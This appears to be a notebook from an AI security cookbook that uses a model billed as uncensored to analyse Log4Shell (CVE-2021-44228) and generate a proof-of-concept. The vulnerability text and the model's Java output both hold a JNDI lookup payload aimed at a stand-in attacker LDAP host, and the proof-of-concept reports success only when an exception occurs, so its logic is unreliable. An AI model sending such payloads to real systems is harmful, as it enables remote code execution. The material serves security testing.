# Use Case Description

Go beyond identifying exposed assets or CVEs: use an uncensored AI model to simulate how each vulnerability in the attack surface could realistically be exploited. This extends attack surface management (ASM) with exploit generation: the model takes asset information and vulnerability metadata as input and outputs attack paths or even exploit code, for use in safe, internal environments only.

## Model used for this use case
Either the Instruct Model or the Reasoning Model is suitable for this task. This example uses the Reasoning Model.

## Setup

The setup scripts below are essentially the same as those in the [Quickstart (Reasoning Model)](https://github.com/RobustIntelligence/foundation-ai-cookbook/blob/main/1_quickstarts/Preview_Quickstart_reasoning_model.ipynb).

### Notice
- The code below assumes that users have access to the models via Hugging Face. If you are using API access instead, please replace the inference code with the API version provided in the Quickstart guide.
- This model is currently in preview mode and may receive updates. As a result, outputs can vary even when parameters are configured to ensure reproducibility.

In [1]:
import os
import transformers
import torch
from IPython.display import display, Markdown

HF_TOKEN = os.getenv("HF_TOKEN")

def _get_device():
    if torch.cuda.is_available():
        return "cuda"
    elif torch.backends.mps.is_available():
        return "mps"
    else:
        return "cpu"

DEVICE = _get_device()

In [2]:
MODEL_ID = "" # To be replaced with the final model name

from transformers import AutoModelForCausalLM, AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained(MODEL_ID, token=HF_TOKEN)
model = AutoModelForCausalLM.from_pretrained(
    pretrained_model_name_or_path=MODEL_ID,
    device_map="auto",
    torch_dtype=torch.float32, # this model's tensor_type is float32
    token=HF_TOKEN,
)


In [4]:
generation_args = {
    "max_new_tokens": 1024,
    "temperature": None,
    "repetition_penalty": 1.2,
    "do_sample": False,
    "use_cache": True,
    "eos_token_id": tokenizer.eos_token_id,
    "pad_token_id": tokenizer.pad_token_id,
}

In [8]:
import re

def inference(prompt):
    messages = [
        {"role": "user", "content": prompt},
    ]
    inputs = tokenizer.apply_chat_template(
        messages, tokenize=False, add_generation_prompt=True
    )

    # The old model version didn’t include the <think> token in the chat template.
    think_token = "<think>\n"
    if not inputs.endswith(think_token):
        inputs += think_token
    
    inputs = tokenizer(inputs, return_tensors="pt").to(DEVICE)
    with torch.no_grad():
        outputs = model.generate(
            **inputs,
            **generation_args,
        )
    response = tokenizer.decode(outputs[0], skip_special_tokens = False)

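    # Extract the generated text after the <think> token, up to <|end_of_text|> if present
    # (generation can stop at max_new_tokens before the end-of-text token is emitted)
    match = re.search(r"<think>(.*?)(?:<\|end_of_text\|>|\Z)", response, re.DOTALL)

    return match.group(1).strip() if match else response.strip()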
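
The extraction step can be tried without loading the model. The sketch below applies a `<think>` ... `<|end_of_text|>` pattern to two hypothetical decoded strings: one complete, and one cut off before the end-of-text token, as can happen when generation reaches `max_new_tokens`. The helper name `extract_generated`, the `<|user|>` marker, and the sample strings are illustrative assumptions and are not taken from the Quickstart.

```python
import re

# Hypothetical decoded outputs; only <think> and <|end_of_text|> mirror inference().
SAMPLE_COMPLETE = "<|user|>Explain X<think>\nStep 1...\nFinal answer.<|end_of_text|>"
SAMPLE_TRUNCATED = "<|user|>Explain X<think>\nStep 1... (cut off at max_new_tokens)"


def extract_generated(response: str) -> str:
    """Return the text after the first <think> token, up to <|end_of_text|> if present."""
    # The lazy group stops at the end-of-text token, or at the end of the string (\Z).
    match = re.search(r"<think>(.*?)(?:<\|end_of_text\|>|\Z)", response, re.DOTALL)
    # Fall back to the whole decoded string when no <think> token is found.
    return match.group(1).strip() if match else response.strip()


print(extract_generated(SAMPLE_COMPLETE))
print(extract_generated(SAMPLE_TRUNCATED))
```

Matching on either the end-of-text token or the end of the string means a truncated generation still returns usable text instead of raising an `AttributeError` on a failed match.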

## Exploit Analysis

In [6]:
def make_prompt(vuln_description):
    return f"""You are a security researcher. Analyze the following vulnerability report and generate:
    
    1. A concise summary of the issue.
    2. Potential impact and affected components.
    3. A safe, hypothetical proof-of-concept exploit (for testing only).
    
    ## VULNERABILITY DESCRIPTION
    {vuln_description}
    
    Ensure the response is for red team / security testing only — no real-world systems or harm implied."""

Given the vulnerability report for CVE-2021-44228, have the model reason about it and generate a document covering the three items above.

In [10]:
vuln_description = """
CVE-2021-44228: Log4Shell Remote Code Execution in Apache Log4j

Description:
A critical remote code execution vulnerability exists in Apache Log4j versions 2.0 to 2.14.1. This flaw allows a remote attacker to execute arbitrary code on the affected system by sending specifically crafted JNDI (Java Naming and Directory Interface) lookup strings through various input vectors. The vulnerability occurs because Log4j evaluates JNDI expressions that can load malicious code from remote servers. Successful exploitation could lead to complete system compromise including data theft, lateral movement within networks, and installation of malware or ransomware.

Triggering Mechanism:
The vulnerability is triggered when Log4j logs a string containing a specific format like "${jndi:ldap://malicious-server/payload}". When this string is processed, Log4j evaluates the JNDI lookup, which can connect to an attacker-controlled LDAP server and load malicious Java code. This can be triggered through various vectors including:
- HTTP headers
- User-agent strings
- Input form fields
- Any other data that might be logged

Affected Software:
- Apache Log4j versions 2.0 to 2.14.1
- Thousands of applications and services using vulnerable Log4j versions including:
  - Apache Struts
  - Apache Solr
  - Apache Druid
  - Elasticsearch
  - Apache Kafka
  - Minecraft servers
  - VMware Horizon
  - Many commercial enterprise products and cloud services

References:
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- CISA Advisory: https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-356a
- Apache Log4j Security Vulnerabilities: https://logging.apache.org/log4j/2.x/security.html
"""
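
The use case description mentions feeding asset information and vulnerability metadata to the model. One possible way to do that is to render structured records into the sectioned free-text layout used above. The following is a minimal sketch; the `VulnRecord` fields and the `to_description` helper are hypothetical names chosen for illustration and are not part of the cookbook.

```python
from dataclasses import dataclass, field


@dataclass
class VulnRecord:
    """Hypothetical container for one finding from a scanner or ASM tool."""
    cve_id: str
    title: str
    description: str
    affected: list[str] = field(default_factory=list)
    references: list[str] = field(default_factory=list)


def to_description(record: VulnRecord) -> str:
    """Render a record in a sectioned layout similar to vuln_description."""
    lines = [f"{record.cve_id}: {record.title}", "", "Description:", record.description]
    # Optional sections are only emitted when the record has entries for them.
    if record.affected:
        lines += ["", "Affected Software:"] + [f"- {item}" for item in record.affected]
    if record.references:
        lines += ["", "References:"] + [f"- {ref}" for ref in record.references]
    return "\n".join(lines)


record = VulnRecord(
    cve_id="CVE-2021-44228",
    title="Log4Shell Remote Code Execution in Apache Log4j",
    description="A critical remote code execution vulnerability exists in Apache Log4j versions 2.0 to 2.14.1.",
    affected=["Apache Log4j versions 2.0 to 2.14.1"],
    references=["NVD: https://nvd.nist.gov/vuln/detail/CVE-2021-44228"],
)
vuln_text = to_description(record)
print(vuln_text)
```

The resulting string can be passed to `make_prompt` in place of a hand-written description.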


In [11]:
response = inference(make_prompt(vuln_description))
display(Markdown(response))

## Summary of Issue

**Vulnerability:** CVE-2021-44228 – Log4Shell RCE in Apache Log4j  
**Severity:** Critical  
**Description:** Apache Log4j versions 2.0 to 2.14.1 contain a remote code execution vulnerability due to improper handling of JNDI lookups. An attacker can send specially crafted log messages with embedded JNDI variables leading to loading of remote code via LDAP. 

**Impact & Affected Components**

* **Potential Impact:** Complete system compromise; attackers may steal sensitive data, move laterally across networks, install malware/ransomware.
* **Affected Components:** 
   * Directly: All applications utilizing Log4j v2.0-2.14.1.
   * Indirectly: Various software relying on these Log4j versions such as Apache Struts, Apache Solr, Apache Druid, Elasticsearch, Apache Kafka, Minecraft servers, VMware Horizon, etc., potentially affecting thousands of services worldwide.

## Hypothetical Proof-of-Concept Exploit (For Testing Only)

To demonstrate the vulnerability without causing actual damage, here's a theoretical POC:

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class PoC {
    private static final Logger logger = LogManager.getLogger(PoC.class);

    public static void main(String[] args) {
        // Trigger the vulnerability by logging a message with a crafted JNDI string
        String payload = "${jndi:ldap://attacker.com/exploit}";
        
        try {
            logger.error("This is a test: " + payload);
        } catch (Exception e) {
            System.out.println("Log4Shell POC executed successfully.");
        }
    }
}
```

### Important Notes:
* **Testing Environment:** Use a controlled environment where you have explicit permission to perform tests. Do not run this against any production or unauthorized systems.
* **Mitigation Steps:** Before running, ensure your own setup mirrors a vulnerable version of Log4j (e.g., 2.12). Apply fixes immediately after testing. In reality, upgrading to version 2.15.0 or applying the recommended configuration changes (`log4j2.formatMsgNoLookups` set to `true`) would prevent exploitation.
* **Ethical Considerations:** Always adhere to ethical guidelines. Unauthorized use of exploits is illegal and unethical.
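
Separately from the model output, a simple version check can help decide which assets are worth sending through this analysis. The sketch below assumes plain `major.minor.patch` version strings and uses the 2.0 to 2.14.1 range quoted in the vulnerability description; the function names are hypothetical, and the Apache Log4j security page listed in the references remains the authoritative source for affected and fixed versions.

```python
def parse_version(version: str) -> tuple[int, ...]:
    """Turn '2.14.1' into (2, 14, 1); pre-release suffixes are not handled."""
    return tuple(int(part) for part in version.split("."))


# Range quoted in the vulnerability description (inclusive on both ends).
AFFECTED_MIN = parse_version("2.0")
AFFECTED_MAX = parse_version("2.14.1")


def in_described_range(version: str) -> bool:
    """True if the version falls inside the range stated in the description."""
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


for candidate in ["1.2.17", "2.12.1", "2.14.1", "2.15.0"]:
    print(candidate, in_described_range(candidate))
```

Comparing integer tuples avoids the string-comparison pitfall where `"2.9"` would sort after `"2.14"`.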